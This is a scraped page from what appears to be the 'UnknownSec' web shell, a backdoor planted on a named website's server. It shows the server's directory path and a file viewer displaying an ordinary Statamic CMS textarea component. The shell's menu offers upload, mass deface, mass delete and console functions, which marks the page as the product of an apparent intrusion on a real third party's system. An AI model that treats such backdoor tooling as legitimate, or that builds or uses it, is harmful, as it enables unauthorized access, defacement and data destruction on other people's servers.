shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
js
/
components
/
inputs
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Textarea.vue
<template> <div> <textarea class="input-text" ref="textarea" :value="value" :id="id" :disabled="disabled" :readonly="isReadOnly" :placeholder="placeholder" :autofocus="focus" @input="$emit('input', $event.target.value)" @focus="$emit('focus')" @blur="$emit('blur')" /> <div class="rtl:text-left ltr:text-right text-xs -mb-3 @sm:-mb-5 @lg:-mb-5" :class="limitIndicatorColor" v-if="limit"> <span v-text="currentLength"></span>/<span v-text="limit"></span> </div> </div> </template> <script> import LengthLimiter from '../LengthLimiter.vue' import autosize from 'autosize'; export default { mixins: [LengthLimiter], props: { disabled: { default: false }, isReadOnly: { type: Boolean, default: false }, placeholder: { required: false }, value: { required: true }, id: { default: null }, focus: { type: Boolean, default: false } }, mounted() { autosize(this.$refs.textarea); if (this.focus) { this.$refs.textarea.focus(); } setTimeout(() => { this.updateSize(); }, 1); this.$events.$on('tab-switched', this.updateSize); }, beforeDestroy() { autosize.destroy(this.$refs.textarea); }, methods: { updateSize() { this.$nextTick(function() { autosize.update(this.$refs.textarea) }) } } } </script>
© 2026 UnknownSec